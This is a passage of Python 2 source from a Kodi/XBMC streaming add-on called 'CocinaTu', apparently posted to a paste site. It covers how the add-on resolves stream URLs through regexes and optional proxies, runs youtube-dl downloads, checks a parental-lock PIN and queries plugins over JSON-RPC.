  3210. # addLink(listlinkT,listtitleT.encode('utf-8', 'ignore'),listthumbnailT,'','','','',True,None,newcopy, len(ret))
  3211. regex_xml=''
  3212. # print 'newcopy',newcopy
  3213. if len(newcopy)>0:
  3214. regex_xml=d2x(newcopy,'lsproroot')
  3215. regex_xml=regex_xml.split('<lsproroot>')[1].split('</lsproroot')[0]
  3216.  
  3217. #ln+='\n<item>%s\n%s</item>'%(listrepeatT.encode("utf-8"),regex_xml)
  3218. try:
  3219. ln+='\n<item>%s\n%s</item>'%(listrepeatT,regex_xml)
  3220. except: ln+='\n<item>%s\n%s</item>'%(listrepeatT.encode("utf-8"),regex_xml)
  3221. except: traceback.print_exc(file=sys.stdout)
  3222. # print repr(ln)
  3223. # print newcopy
  3224.  
  3225. # ln+='</item>'
  3226.  
  3227. addon_log(repr(ln))
  3228. getData('','',ln)
  3229. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3230. else:
  3231. url,setresolved = getRegexParsed(regexs, url)
  3232. print repr(url),setresolved,'imhere'
  3233. if not (regexs and 'notplayable' in regexs and not url):
  3234. if url:
  3235. if '$PLAYERPROXY$=' in url:
  3236. url,proxy=url.split('$PLAYERPROXY$=')
  3237. print 'proxy',proxy
  3238. #Jairox mod for proxy auth
  3239. proxyuser = None
  3240. proxypass = None
  3241. if len(proxy) > 0 and '@' in proxy:
  3242. proxy = proxy.split(':')
  3243. proxyuser = proxy[0]
  3244. proxypass = proxy[1].split('@')[0]
  3245. proxyip = proxy[1].split('@')[1]
  3246. port = proxy[2]
  3247. else:
  3248. proxyip,port=proxy.split(':')
  3249.  
  3250. playmediawithproxy(url,name,iconimage,proxyip,port, proxyuser,proxypass) #jairox
  3251. else:
  3252. playsetresolved(url,name,iconimage,setresolved,regexs)
  3253. else:
  3254. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Failed to extract regex. - "+"this"+",4000,"+icon+")")
  3255. elif mode==18:
  3256. addon_log("youtubedl")
  3257. try:
  3258. import youtubedl
  3259. except Exception:
  3260. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Please [COLOR yellow]install Youtube-dl[/COLOR] module ,10000,"")")
  3261. stream_url=youtubedl.single_YD(url)
  3262. playsetresolved(stream_url,name,iconimage)
  3263. elif mode==19:
  3264. addon_log("Genesiscommonresolvers")
  3265. playsetresolved (urlsolver(url),name,iconimage,True)
  3266.  
  3267. elif mode==21:
  3268. addon_log("download current file using youtube-dl service")
  3269. mtype='video'
  3270. if '[mp3]' in name:
  3271. mtype='audio'
  3272. name=name.replace('[mp3]','')
  3273. ytdl_download('',name, mtype)
  3274. elif mode==23:
  3275. addon_log("get info then download")
  3276. mtype='video'
  3277. if '[mp3]' in name:
  3278. mtype='audio'
  3279. name=name.replace('[mp3]','')
  3280. ytdl_download(url,name,mtype)
  3281. elif mode==24:
  3282. addon_log("Audio only youtube download")
  3283. ytdl_download(url,name,'audio')
  3284. elif mode==25:
  3285. addon_log("Searchin Other plugins")
  3286. _search(url,name)
  3287. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3288. elif mode==55:
  3289. addon_log("enabled lock")
  3290. parentalblockedpin =addon.getSetting('parentalblockedpin')
  3291. keyboard = xbmc.Keyboard('','introduzca la contraseña')
  3292. keyboard.doModal()
  3293. if not (keyboard.isConfirmed() == False):
  3294. newStr = keyboard.getText()
  3295. if newStr==parentalblockedpin:
  3296. addon.setSetting('parentalblocked', "false")
  3297. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Control Parental On,5000,"+icon+")")
  3298. else:
  3299. xbmc.executebuiltin("XBMC.Notification(CocinaTu, olvido la clave?? ,5000,"+icon+")")
  3300. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3301. elif mode==56:
  3302. addon_log("disable lock")
  3303. addon.setSetting('parentalblocked', "true")
  3304. xbmc.executebuiltin("XBMC.Notification(CocinaTu, Control Parental Off,5000,"+icon+")")
  3305. xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3306.  
  3307. elif mode==53:
  3308. addon_log("Requesting JSON-RPC Items")
  3309. pluginquerybyJSON(url)
  3310. #xbmcplugin.endOfDirectory(int(sys.argv[1]))
  3311. if not viewmode==None:
  3312. print 'setting view mode'
  3313. xbmc.executebuiltin("Container.SetViewMode(%s)"%viewmode)
Add Comment
Please, Sign In to add comment